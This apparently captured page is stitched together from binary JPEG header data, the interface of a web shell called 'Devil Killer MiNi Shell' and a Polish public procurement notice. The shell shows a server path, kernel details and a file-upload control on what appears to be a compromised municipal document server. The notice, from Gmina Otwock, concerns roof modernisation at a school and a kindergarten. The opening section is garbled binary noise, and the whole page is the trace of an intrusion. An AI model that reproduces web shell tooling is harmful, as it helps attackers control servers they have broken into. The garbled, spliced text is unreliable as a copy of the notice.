JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211123/0028096901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dachów wraz z niezbędnymi odbiorami robót w budynkach oświatowych <br/>w Otwocku ramach zadania budżetowego pn., „Termomodernizacja obiektów użyteczności publicznej miasta Otwocka” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Otwock</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013268770</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@otwock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.otwock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dachów wraz z niezbędnymi odbiorami robót w budynkach oświatowych <br/>w Otwocku ramach zadania budżetowego pn., „Termomodernizacja obiektów użyteczności publicznej miasta Otwocka” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f199895-4c68-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00280969</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://otwock.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja za pośrednictwem<br/>Platformy Zamawiającego https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji:1.1. Elektronicznie za<br/>pośrednictwem Platformy znajdującej się pod adresem: https://otwock.ezamawiajacy.pl w<br/>zakładce„Korespondencja”.2. Ogólne zasady korzystania z Platformy, ;2.1.zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Systemu na subdomenie Miasto Otwock ;<br/>https://otwock.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.2.2. Wykonawca po wybraniu<br/>opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e -mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”. 2.3. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku<br/>rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. 2.4.Po założeniu konta<br/>Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz<br/>informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.3.Zamawiający<br/>zgodnie określa dopuszczalny format podpisu elektronicznego, jako:3.1. dokumenty w formacie „pdf&#34;<br/>zaleca się podpisywać formatem PAdES,3.2. dopuszcza się podpisanie dokumentów w formacie innym<br/>niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie<br/>zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.4.Zamawiający<br/>określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB wtxt, rtf, pdf ,xps,<br/>odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,wav, mp3, avi, mpg,<br/>mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,gml, rng, xsl, xslt,<br/>TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.5. Zamawiający określa informacje natemat kodowania i<br/>czasu odbioru danych tj.:5.1. Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany,<br/>widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.6.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.62.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest :<br/>Zadanie I Wykonanie prac polegających na modernizacji dachu sali gimnastycznej poprzez: <br/>1.	Przygotowanie projektu docieplenia modernizowanego dachu,<br/>2.	Demontaż starych obróbek blacharskich, rynien, rur spustowych i instalacji odgromowej,<br/>3.	Rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów,<br/>4.	Naprawa i w przypadku potrzeby podwyższenie kominów, attyk oraz elementów wentylacji do wysokości zgodnej z przepisami,<br/>5.	Montaż nowych obróbek blacharskich, rynien, rur spustowych,<br/>6.	Wykonanie nowej instalacji odgromowej,<br/>7.	Wyrównanie płaszczyzny powierzchni dachu,<br/>8.	Docieplenie stropodachu niewentylowanego warstwą styropianu (o współczynniku przewodzenia ciepła λ= 0,038 W/(m K)), o grubości 22 cm i pokrycie dachu papą termozgrzewalną oraz papą wierzchniego krycia. Współczynnik przenikania ciepła przegrody po dociepleniu wyniesie U=0,147 W/(m2*K), <br/>w formule „projektuj i buduj” w Szkole Podstawowej nr 4 w Otwocku przy ul. Szkolnej 31.<br/>Opis przedmiotu zamówienia określa Program funkcjonalno-użytkowy.<br/>5.	Ponadto Wykonawca zobowiązany jest do :<br/> 1) zabezpieczenie terenu robót, <br/> 2) zapewnienie stałego nadzoru i kontroli prowadzonych robót,<br/> 3) zapewnienie bieżącej obsługi wykonanych prac,<br/> 4) organizacja zaplecza budowy, <br/> 5) ubezpieczenie budowy,<br/>6) wykonanie niezbędnych robót towarzyszących i czynności formalno-prawnych umożliwiających przekazanie wykonanych robót do eksploatacji - między innymi odbiorów technicznych, a także sporządzenia kompletnej dokumentacji powykonawczej <br/>z zaznaczeniem wprowadzonych zmian,<br/>7) wykonania wszystkich innych prac, w tym nie ujętych w projekcie umowy, <br/>a niezbędnych do prawidłowego funkcjonowania obiektu oraz towarzyszących niezbędnych do prawidłowego wykonania przedmiotu umowy, w tym w przypadku wykonanie nowych obróbek blacharskich, parapetów, orynnowania, odtworzenie instalacji i wyposażenia zewnętrznego. Uporządkowania terenu w rejonie wykonywanych prac <br/>po ich zakończeniu. <br/>8) naprawienia w sposób estetyczny wszelkich ubytków i uszkodzeń tynków i posadzek powstałych w wyniku prowadzonych prac wraz z wykonaniem nowych powłok malarskich w ich rejonie z zastosowaniem farb i okładzin zbliżonych do istniejących. <br/>W przypadku uszkodzenia elementów przyległych, obróbek blacharskich, parapetów wewnętrznych i zewnętrznych w wyniku prowadzonych prac do wymiany na nowe zbliżony do istniejących. <br/> 9) prowadzenie prac w uzgodnieniu z Dyrekcją Szkoły w sposób umożliwiający prawidłowe funkcjonowanie szkoły.<br/>10) Wykonawca przyjmuje do wiadomości, że roboty stanowiące przedmiot niniejszej umowy stanowią część realizowanego przez Zamawiającego zadania pn. „Termomodernizacja obiektów użyteczności publicznej miasta Otwock”. W związku <br/>z powyższym Wykonawca zobowiązuje się do:<br/>a)	współpracy z pozostałymi Wykonawcami wykonującymi roboty budowlane <br/>w obrębie placówki. <br/>b)	sporządzenia dokumentacji fotograficznej terenu budowy na dzień rozpoczęcia prac oraz na dzień dokonania odbioru końcowego i przekazania jej Zamawiającemu w formie cyfrowej oraz w formie papierowej (nie więcej niż 4 zdjęć na arkusz). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7: o wartości netto: Zadanie I do kwoty 60 000,00 zł. w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia podstawowego, w tym pozostających w zgodności z podstawowym zamierzeniem budowlanym oraz związanym bezpośrednio przez identyfikację zamówienia z realizacją podstawowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest :<br/><br/>Zadanie II Wykonanie prac polegających na modernizacji dachu poprzez: <br/>1.	Przygotowanie projektu wymiany poszycia dachowego<br/>2.	Usunięcie istniejącego poszycia wraz z obróbkami blacharskimi i innymi niezbędnymi elementami<br/>3.	Wykonanie impregnacji konstrukcji, poszycia z desek przed korozją biologiczną,<br/>4.	Miejscowe naprawy poszycia z desek,<br/>5.	Montaż nowych obróbek blacharskich z blachy powlekanej,<br/>6.	Montaż membrany paroprzepuszczalnej,<br/>7.	Montaż kontrłat i łat,<br/>8.	Wykonanie pokrycia z dachówki ceramicznej dostosowanej kolorem i kształtem do istniejącej dachówki,<br/>9.	Wykonanie oddzielenia konstrukcji dachu od pomieszczeń na poddaszu przegrodą wykonania z płyt GK ogniowych – zgodnie z projektem zabezpieczenia,<br/>10.	Naprawa i w przypadku potrzeby podwyższenie kominów, attyk oraz elementów wentylacji do wysokości zgodnej z przepisami,<br/>11.	Utylizacja powstałych odpadów i uporządkowanie placu budowy.<br/>Instalacje odgromowa jest realizowana w odrębnym etapie <br/>w formule „projektuj i buduj” w Przedszkolu nr 4 w Otwocku przy ul. Dwernickiego 1, zgodnie z opinią dotyczącą pokrycia dachowego oraz projektem budowlanym zabezpieczeń przeciwpożarowych. <br/>4.	Opis przedmiotu zamówienia określa Program funkcjonalno-użytkowy.<br/>5.	Ponadto Wykonawca zobowiązany jest do :<br/> 1) zabezpieczenie terenu robót, <br/> 2) zapewnienie stałego nadzoru i kontroli prowadzonych robót,<br/> 3) zapewnienie bieżącej obsługi wykonanych prac,<br/> 4) organizacja zaplecza budowy, <br/> 5) ubezpieczenie budowy,<br/>6) wykonanie niezbędnych robót towarzyszących i czynności formalno-prawnych umożliwiających przekazanie wykonanych robót do eksploatacji - między innymi odbiorów technicznych, a także sporządzenia kompletnej dokumentacji powykonawczej <br/>z zaznaczeniem wprowadzonych zmian,<br/>7) wykonania wszystkich innych prac, w tym nie ujętych w projekcie umowy, <br/>a niezbędnych do prawidłowego funkcjonowania obiektu oraz towarzyszących niezbędnych do prawidłowego wykonania przedmiotu umowy, w tym w przypadku wykonanie nowych obróbek blacharskich, parapetów, orynnowania, odtworzenie instalacji i wyposażenia zewnętrznego. Uporządkowania terenu w rejonie wykonywanych prac <br/>po ich zakończeniu. <br/>8) naprawienia w sposób estetyczny wszelkich ubytków i uszkodzeń tynków i posadzek powstałych w wyniku prowadzonych prac wraz z wykonaniem nowych powłok malarskich w ich rejonie z zastosowaniem farb i okładzin zbliżonych do istniejących. <br/>W przypadku uszkodzenia elementów przyległych, obróbek blacharskich, parapetów wewnętrznych i zewnętrznych w wyniku prowadzonych prac do wymiany na nowe zbliżony do istniejących. <br/> 9) prowadzenie prac w uzgodnieniu z Dyrekcją Szkoły w sposób umożliwiający prawidłowe funkcjonowanie szkoły.<br/>10) Wykonawca przyjmuje do wiadomości, że roboty stanowiące przedmiot niniejszej umowy stanowią część realizowanego przez Zamawiającego zadania pn. „Termomodernizacja obiektów użyteczności publicznej miasta Otwock”. W związku <br/>z powyższym Wykonawca zobowiązuje się do:<br/>a)	współpracy z pozostałymi Wykonawcami wykonującymi roboty budowlane <br/>w obrębie placówki. <br/>b)	sporządzenia dokumentacji fotograficznej terenu budowy na dzień rozpoczęcia prac oraz na dzień dokonania odbioru końcowego i przekazania jej Zamawiającemu w formie cyfrowej oraz w formie papierowej (nie więcej niż 4 zdjęć na arkusz). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7: o wartości netto: Zadanie II do kwoty 65 000,00 zł. w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia podstawowego, w tym pozostających w zgodności z podstawowym zamierzeniem budowlanym oraz związanym bezpośrednio przez identyfikację zamówienia z realizacją podstawowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniają następujące warunki w postępowaniu: a) nie podlegają wykluczeniu - z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych: w art. 108 ust. 1 p.z.p.; b) którzy spełniają warunki dotyczące: zdolności technicznej lub zawodowej:a) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje/będzie dysponował: <br/>co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia <br/>na stanowisku kierownika robót, posiadającą ważne uprawnienia budowlane <br/>do kierowania robotami budowlanymi w specjalności elektrycznej - dotyczy <br/>części 1 i części 2.<br/>b) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje/będzie dysponował: <br/>co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia <br/>na stanowisku kierownika robót, posiadającą ważne uprawnienia budowlane <br/>do kierowania robotami budowlanymi w specjalności ogólnobudowlanej <br/>lub budowlanej - dotyczy części 1; części 2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 